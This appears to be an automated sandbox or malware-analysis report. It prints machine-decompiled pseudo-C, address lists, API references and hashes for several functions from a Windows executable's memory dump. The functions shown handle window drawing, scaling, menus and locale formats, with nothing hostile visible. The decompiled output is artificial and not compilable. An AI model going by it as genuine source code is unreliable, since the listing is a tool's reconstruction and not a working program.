							DrawFrameControl(E00420704(_v8),  &_v24, 3, 0x4005);
						} else {
							DrawFrameControl(E00420704(_v8),  &_v24, 3, 0x4005);
						}
					}
					_pop(_t165);
					 *[fs:eax] = _t165;
					_push(0x42d0f8);
					return E004035DC(_v8);
				}
			}

0x0042cec8
0x0042cec9
0x0042cecb
0x0042ced0
0x0042ced1
0x0042ced5
0x0042ceda
0x0042cee1
0x0042d0fe
0x0042cee7
0x0042cef3
0x0042cf01
0x0042cf09
0x0042cf15
0x0042cf21
0x0042cf2c
0x0042cf39
0x0042cf44
0x0042cf50
0x0042cf56
0x0042cf5f
0x0042cf61
0x0042cf61
0x0042cf6e
0x0042cf70
0x0042cf70
0x0042cf76
0x0042cf78
0x0042cf81
0x0042cf8d
0x0042cf98
0x0042cfa5
0x0042cfb0
0x0042cfb0
0x0042cfbc
0x0042cfc4
0x0042cfd9
0x0042cfe2
0x0042cfe4
0x0042cfe4
0x0042cfee
0x0042cff0
0x0042cff0
0x0042cffa
0x0042cffc
0x0042cffc
0x0042d005
0x0042d00e
0x0042d00e
0x0042d018
0x0042d01a
0x0042d01a
0x0042d023
0x0042d02c
0x0042d02c
0x0042d087
0x0042d099
0x0042d0a5
0x0042d0d6
0x0042d0a7
0x0042d0bb
0x0042d0bb
0x0042d0a5
0x0042d0dd
0x0042d0e0
0x0042d0e3
0x0042d0f0
0x0042d0f0

APIs

Part of subcall function 0041FD3C: RtlInitializeCriticalSection.KERNEL32(004234C4,0042348C,00000000,00000001,00423622,?,?,00000000,0042488D,?,?,0041FEAE), ref: 0041FD5C

Part of subcall function 004202C0: FrameRect.USER32 ref: 004202E8

InflateRect.USER32(?,000000FF,000000FF), ref: 0042CF39
InflateRect.USER32(?,000000FF,000000FF), ref: 0042CFA5
GetWindowLongA.USER32 ref: 0042CFD4
GetSystemMetrics.USER32 ref: 0042D009
GetSystemMetrics.USER32 ref: 0042D027
DrawEdge.USER32(00000000,?,00000000,00000008), ref: 0042D087
GetSystemMetrics.USER32 ref: 0042D08E
DrawFrameControl.USER32 ref: 0042D0BB

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsRectSystem$DrawFrameInflate$ControlCriticalEdgeInitializeLongSectionWindow
String ID:
API String ID: 1475008941-0
Opcode ID: a6c28e7db0a94345288ba80302c25785e9ab782877354c737774435ecb367ad0
Instruction ID: 6acb97b55e3052391140d43799a60e2398efebc06591f39235f9b2ffc20e95ca
Opcode Fuzzy Hash: a6c28e7db0a94345288ba80302c25785e9ab782877354c737774435ecb367ad0
Instruction Fuzzy Hash: 9761E670B002059BCB00DF69DD85BDEB7F5AF45308F5501BAF804AB2A6D739AE05CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00435790, Relevance: 13.6, APIs: 9, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00435790(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x43593c; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x435934; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x43593c; // 0x0
				if(_t113 != (_t107 &  *0x435938)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x43593c; // 0x0
				if(_t114 != (_t107 &  *0x435940)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E0041F6A0( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0041F684( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}

0x00435797
0x0043579a
0x0043579c
0x004357a1
0x0043591e
0x0043591e
0x00435923
0x00435930
0x00435930
0x004357ab
0x004357b5
0x004357ad
0x004357ad
0x004357ad
0x004357be
0x004357d2
0x004357c0
0x004357ce
0x004357ce
0x004357d8
0x004357f1
0x004357da
0x004357e8
0x004357e8
0x004357f8
0x00435832
0x00435835
0x00435800
0x00435803
0x00435827
0x0043582c
0x00435805
0x00435816
0x00435818
0x00435818
0x00435803
0x0043583c
0x00435841
0x00435885
0x00435849
0x00435851
0x0043587c
0x00435853
0x00435868
0x00435868
0x00435851
0x0043589d
0x004358ab
0x004358b3
0x004358c6
0x004358c6
0x004358d4
0x004358dc
0x004358ef
0x004358ef
0x004358f9
0x00435919
0x00435919
0x00000000

APIs

MulDiv.KERNEL32(?,?,?), ref: 004357C9
MulDiv.KERNEL32(?,?,?), ref: 004357E3
MulDiv.KERNEL32(?,?,?), ref: 00435811
MulDiv.KERNEL32(?,?,?), ref: 00435827
MulDiv.KERNEL32(?,?,?), ref: 0043585F
MulDiv.KERNEL32(?,?,?), ref: 00435877
MulDiv.KERNEL32(?,?,0000001F), ref: 004358C1
MulDiv.KERNEL32(?,?,0000001F), ref: 004358EA
MulDiv.KERNEL32(00000000,?,0000001F), ref: 00435910

Part of subcall function 0041F6A0: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F6AD

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f18b265cd14c24dbb295db7c30f8ffc70c31fde34f80517ba9dce50c36a8a084
Instruction ID: 05f91db2dc5494731da7da7d01eb392dfc31b18e536d8bce9be381cbbad03249
Opcode Fuzzy Hash: f18b265cd14c24dbb295db7c30f8ffc70c31fde34f80517ba9dce50c36a8a084
Instruction Fuzzy Hash: 4F514D70604B40AFC320EF69C845B6BBBE8AF49354F04582EB9D6D7352C639EC55CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00436630, Relevance: 13.6, APIs: 9, Instructions: 122
windowCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00436630(void* __ebx, char __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				struct HDC__* _t33;
				intOrPtr _t72;
				int _t74;
				intOrPtr _t80;
				int _t83;
				void* _t88;
				int _t89;
				void* _t92;
				void* _t93;
				intOrPtr _t94;

				_t92 = _t93;
				_t94 = _t93 + 0xffffffe0;
				_v5 = __ecx;
				_t74 =  *((intOrPtr*)( *__edx + 0x38))();
				if(_v5 == 0) {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				} else {
					_push(__edx);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_pop(_t88);
				}
				_v12 = GetDesktopWindow();
				_push(0x402);
				_push(0);
				_t33 = _v12;
				_push(_t33);
				L00406EAC();
				_v16 = _t33;
				_push(_t92);
				_push(0x43674b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_v20 = SelectObject(_v16, E0041FC20( *((intOrPtr*)(_t88 + 0x40))));
				_t89 = _v36;
				_t83 = _v32;
				PatBlt(_v16, _t89 + _t74, _t83, _v28 - _t89 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _v28 - _t74, _t83 + _t74, _t74, _v24 - _t83 - _t74, 0x5a0049);
				PatBlt(_v16, _t89, _v24 - _t74, _v28 - _v36 - _t74, _t74, 0x5a0049);
				PatBlt(_v16, _t89, _t83, _t74, _v24 - _v32 - _t74, 0x5a0049);
				SelectObject(_v16, _v20);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(0x436752);
				_push(_v16);
				_t72 = _v12;
				_push(_t72);
				L00407114();
				return _t72;
			}

0x00436631
0x00436633
0x00436639
0x00436645
0x0043664b
0x0043665b
0x00436662
0x00436663
0x00436664
0x00436665
0x00436666
0x0043664d
0x0043664d
0x00436654
0x00436655
0x00436656
0x00436657
0x00436658
0x00436658
0x0043666c
0x0043666f
0x00436674
0x00436676
0x00436679
0x0043667a
0x0043667f
0x00436684
0x00436685
0x0043668a
0x0043668d
0x004366a2
0x004366ae
0x004366b6
0x004366c3
0x004366e5
0x00436704
0x0043671e
0x0043672b
0x00436732
0x00436735
0x00436738
0x00436740
0x00436741
0x00436744
0x00436745
0x0043674a

APIs

GetDesktopWindow.USER32 ref: 00436667
72E7ACE0.USER32(?,00000000,00000402), ref: 0043667A
SelectObject.GDI32(?,00000000), ref: 0043669D
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 004366C3
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 004366E5
PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 00436704
PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0043671E
SelectObject.GDI32(?,?), ref: 0043672B
72E7B380.USER32(?,?,00436752,?,?,00000000,?,005A0049,?,?,?,?,00000000,005A0049,?,?), ref: 00436745

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$B380DesktopWindow
String ID:
API String ID: 989747725-0
Opcode ID: 3af015690ce18ae6242266858263dd2f7745444665cade0dbcb6e78d57d44699
Instruction ID: 36a13c0f66b3c7accd49027f9abdca4b27dd93f0e51766844771ffcb45b04fd4
Opcode Fuzzy Hash: 3af015690ce18ae6242266858263dd2f7745444665cade0dbcb6e78d57d44699
Instruction Fuzzy Hash: AF313D75A00219BFDB00DEEDCC89DAFBBBCEF49704B018469B504F7241C679AD008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF8C, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040AF8C(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b257);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040AE18();
				E00409A60(__ebx, __edi, __esi);
				_t196 =  *0x4927fc;
				if( *0x4927fc != 0) {
					E00409C38(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E004099B0(_t43, 0, 0x14,  &_v20);
				E0040439C(0x492730, _v20);
				E004099B0(_t43, 0x40b26c, 0x1b,  &_v24);
				 *0x492734 = E0040879C(0x40b26c, 0, _t196);
				E004099B0(_t132, 0x40b26c, 0x1c,  &_v28);
				 *0x492735 = E0040879C(0x40b26c, 0, _t196);
				 *0x492736 = E004099FC(_t132, 0x2c, 0xf);
				 *0x492737 = E004099FC(_t132, 0x2e, 0xe);
				E004099B0(_t132, 0x40b26c, 0x19,  &_v32);
				 *0x492738 = E0040879C(0x40b26c, 0, _t196);
				 *0x492739 = E004099FC(_t132, 0x2f, 0x1d);
				E004099B0(_t132, "m/d/yy", 0x1f,  &_v40);
				E00409CE8(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E0040439C(0x49273c, _v36);
				E004099B0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E00409CE8(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E0040439C(0x492740, _v44);
				 *0x492744 = E004099FC(_t132, 0x3a, 0x1e);
				E004099B0(_t132, 0x40b2a0, 0x28,  &_v52);
				E0040439C(0x492748, _v52);
				E004099B0(_t132, 0x40b2ac, 0x29,  &_v56);
				E0040439C(0x49274c, _v56);
				E00404348( &_v12);
				E00404348( &_v16);
				E004099B0(_t132, 0x40b26c, 0x25,  &_v60);
				_t104 = E0040879C(0x40b26c, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E004043E0( &_v8, 0x40b2c4);
				} else {
					E004043E0( &_v8, 0x40b2b8);
				}
				E004099B0(_t132, 0x40b26c, 0x23,  &_v64);
				_t111 = E0040879C(0x40b26c, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E004099B0(_t132, 0x40b26c, 0x1005,  &_v68);
					if(E0040879C(0x40b26c, 0, _t198) != 0) {
						E004043E0( &_v12, 0x40b2e0);
					} else {
						E004043E0( &_v16, 0x40b2d0);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004046C0();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E004046C0();
				 *0x4927fe = E004099FC(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B25E);
				return E0040436C( &_v68, 0x10);
			}

0x0040af8c
0x0040af8c
0x0040af8d
0x0040af8f
0x0040af94
0x0040af94
0x0040af96
0x0040af98
0x0040af98
0x0040af9b
0x0040af9e
0x0040af9f
0x0040afa4
0x0040afa7
0x0040afaa
0x0040afaf
0x0040afb4
0x0040afbb
0x0040afbd
0x0040afbd
0x0040afc7
0x0040afd6
0x0040afe3
0x0040aff8
0x0040b007
0x0040b01c
0x0040b02b
0x0040b03e
0x0040b051
0x0040b066
0x0040b075
0x0040b088
0x0040b09d
0x0040b0a8
0x0040b0b5
0x0040b0ca
0x0040b0d5
0x0040b0e2
0x0040b0f5
0x0040b10a
0x0040b117
0x0040b12c
0x0040b139
0x0040b141
0x0040b149
0x0040b15e
0x0040b168
0x0040b16d
0x0040b16f
0x0040b188
0x0040b171
0x0040b179
0x0040b179
0x0040b19d
0x0040b1a7
0x0040b1ac
0x0040b1ae
0x0040b1c0
0x0040b1d1
0x0040b1ea
0x0040b1d3
0x0040b1db
0x0040b1db
0x0040b1d1
0x0040b1ef
0x0040b1f2
0x0040b1f5
0x0040b1fa
0x0040b207
0x0040b20c
0x0040b20f
0x0040b212
0x0040b217
0x0040b224
0x0040b237
0x0040b23e
0x0040b241
0x0040b244
0x0040b256

APIs

GetThreadLocale.KERNEL32(00000000,0040B257,?,?,00000000,00000000), ref: 0040AFC2

Part of subcall function 004099B0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099CE

Strings

:mm:ss, xrefs: 0040B212
:mm, xrefs: 0040B1F5
AMPM, xrefs: 0040B1D6
AMPM , xrefs: 0040B1E5
m/d/yy, xrefs: 0040B091
mmmm d, yyyy, xrefs: 0040B0BE

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
API String ID: 4232894706-2493093252
Opcode ID: c7280590449ea807df80cb4063d335bb700ae5b4b0721a30384d7ff1e223ad86
Instruction ID: f7b0a5c8af3475563ed6979dcd4d7b42db68775136df7043b35d506b5f104953
Opcode Fuzzy Hash: c7280590449ea807df80cb4063d335bb700ae5b4b0721a30384d7ff1e223ad86
Instruction Fuzzy Hash: 8F614A707002089BDB00EBE6D991A9F76A6EB88304F10947FA640BB3D6DB7CDD05979C

Uniqueness

Uniqueness Score: -1.00%

Function 00445400, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 187
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00445400(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x44565b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x445662);
					E00404348( &_v68);
					return E00404348( &_v12);
				}
				E004043E0( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E0044723C(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x476ad0 + ((E00404744( *((intOrPtr*)(_t154 + 0x30)), 0x445680) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x00476AC4 |  *0x00476AB4 |  *0x00476ABC | 0x00000400;
							_t103 = E0044723C(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004047F8(_v12));
							} else {
								_t109 = E004047F8( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E00445904(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E004477F8(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E00446E14(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x476b04 + ((E00404744( *((intOrPtr*)(_t154 + 0x30)), 0x445680) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x00476AFC |  *0x00476AD8 |  *0x00476B0C |  *0x00476B14;
							_v61.fState =  *0x00476AE4 |  *0x00476AF4 |  *0x00476AEC;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E004047F8(_v12);
							if(E0044723C(_t154) > 0) {
								_v61.hSubMenu = E00445904(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x445674);
						E00444A64( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E004046C0();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x4442f4; // 0x444340
					_t149 = E00403768( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E00445904(_t154);
				goto L8;
			}

0x00445400
0x0044540b
0x0044540e
0x00445411
0x00445414
0x00445416
0x0044541a
0x0044541b
0x00445420
0x00445423
0x0044542a
0x0044563d
0x0044563f
0x00445642
0x00445645
0x0044564d
0x0044565a
0x0044565a
0x00445436
0x00445444
0x00445452
0x00445457
0x0044549c
0x004454aa
0x004455f6
0x004455fe
0x00445603
0x00445605
0x00445638
0x00445607
0x0044560a
0x0044561f
0x0044561f
0x00000000
0x00445605
0x004454b0
0x004454b7
0x004454c5
0x004454c9
0x004454e0
0x004454ee
0x004454ee
0x00000000
0x004454ee
0x004454ea
0x004454ec
0x00000000
0x00000000
0x00000000
0x004454f2
0x004454f2
0x004454f2
0x004454f4
0x004454f4
0x00445543
0x0044556a
0x00445571
0x00445576
0x0044557b
0x00445580
0x0044558b
0x00445597
0x004455a0
0x004455a0
0x004455ac
0x00000000
0x004455ac
0x004454c9
0x00445459
0x0044545c
0x0044545e
0x00445478
0x00445478
0x0044547b
0x00445487
0x0044548c
0x00445497
0x00000000
0x00445497
0x00445460
0x00445464
0x00000000
0x00000000
0x00445469
0x0044546f
0x00445474
0x00445476
0x00000000
0x00000000
0x00000000
0x00445476
0x0044544d
0x00000000

APIs

InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 004455AC
GetVersion.KERNEL32(00000000,0044565B), ref: 0044549C

Part of subcall function 00445904: CreatePopupMenu.USER32(?,00445617,00000000,00000000,0044565B), ref: 0044591F

Strings

@CD, xrefs: 00445469
,, xrefs: 004454B0
?, xrefs: 004454B7

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$CreateInsertItemPopupVersion
String ID: ,$?$@CD
API String ID: 133695497-3742550023
Opcode ID: 751d677e1906d0730ff5f3084fbc4bb296e71803ac61173649860844270ef62d
Instruction ID: 7ebd36ed19c46884f593e8d40177bac7499cd1e850afad9049dc4fc8f031cc35
Opcode Fuzzy Hash: 751d677e1906d0730ff5f3084fbc4bb296e71803ac61173649860844270ef62d
Instruction Fuzzy Hash: 4B61F270A006449BEF10EF79D8816AA7BF6AF4A314B46447AE844EB397D738D845C718

Uniqueness

Uniqueness Score: -1.00%

Function 00433500, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 139
threadCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00433500(intOrPtr __eax, void* __ecx, char _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HWND__* _v24;
				intOrPtr _v28;
				char _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct HWND__* _t53;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t78;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t98;
				intOrPtr _t101;
				void* _t102;
				intOrPtr* _t104;
				intOrPtr _t106;
				intOrPtr _t110;
				intOrPtr _t112;
				struct HWND__* _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t117;

				_t102 = __ecx;
				_t101 = __eax;
				_v5 = 1;
				_t2 =  &_a4; // 0x433821
				_t113 = E00433938( *_t2 + 0xfffffff7);
				_v24 = _t113;
				_t53 = GetWindow(_t113, 4);
				_t104 =  *0x49111c; // 0x492c04
				if(_t53 ==  *((intOrPtr*)( *_t104 + 0x30))) {
					L6:
					if(_v24 == 0) {
						L25:
						return _v5;
					}
					_t114 = _t101;
					while(1) {
						_t55 =  *((intOrPtr*)(_t114 + 0x30));
						if(_t55 == 0) {
							break;
						}
						_t114 = _t55;
					}
					_t112 = E0043C1F4(_t114);
					_v28 = _t112;
					if(_t112 == _v24) {
						goto L25;
					}
					_t12 =  &_a4; // 0x433821
					_t60 =  *((intOrPtr*)( *((intOrPtr*)( *_t12 - 0x10)) + 0x30));
					if(_t60 == 0) {
						_t18 =  &_a4; // 0x433821
						_t106 =  *0x431d04; // 0x431d50
						__eflags = E00403768( *((intOrPtr*)( *_t18 - 0x10)), _t106);
						if(__eflags == 0) {
							__eflags = 0;
							_v32 = 0;
						} else {
							_t20 =  &_a4; // 0x433821
							_v32 = E0043C1F4( *((intOrPtr*)( *_t20 - 0x10)));
						}
						L19:
						_v12 = 0;
						_t65 = _a4;
						_v20 =  *((intOrPtr*)(_t65 - 9));
						_v16 =  *((intOrPtr*)(_t65 - 5));
						_push( &_v32);
						_push(E00433494);
						_push(GetCurrentThreadId());
						L00406E2C();
						_t126 = _v12;
						if(_v12 == 0) {
							goto L25;
						}
						GetWindowRect(_v24,  &_v48);
						_push(_a4 + 0xfffffff7);
						_push(_a4 - 1);
						E004037D8(_t101, _t126);
						_t78 =  *0x492b8c; // 0x0
						_t110 =  *0x430ae0; // 0x430b2c
						if(E00403768(_t78, _t110) == 0) {
							L23:
							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
								_v5 = 0;
							}
							goto L25;
						}
						_t84 =  *0x492b8c; // 0x0
						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
							goto L23;
						}
						_t86 =  *0x492b8c; // 0x0
						if(E0043C1F4( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
							goto L25;
						}
						goto L23;
					}
					_t116 = _t60;
					while(1) {
						_t93 =  *((intOrPtr*)(_t116 + 0x30));
						if(_t93 == 0) {
							break;
						}
						_t116 = _t93;
					}
					_v32 = E0043C1F4(_t116);
					goto L19;
				}
				_t117 = E00432A88(_v24, _t102);
				if(_t117 == 0) {
					goto L25;
				} else {
					while(1) {
						_t98 =  *((intOrPtr*)(_t117 + 0x30));
						if(_t98 == 0) {
							break;
						}
						_t117 = _t98;
					}
					_v24 = E0043C1F4(_t117);
					goto L6;
				}
			}

0x00433500
0x00433509
0x0043350b
0x0043350f
0x0043351a
0x0043351c
0x00433522
0x00433527
0x00433532
0x0043355b
0x0043355f
0x0043368e
0x00433697
0x00433697
0x00433565
0x0043356b
0x0043356b
0x00433570
0x00000000
0x00000000
0x00433569
0x00433569
0x00433579
0x0043357b
0x00433581
0x00000000
0x00000000
0x00433587
0x0043358d
0x00433592
0x004335b0
0x004335b6
0x004335c1
0x004335c3
0x004335d5
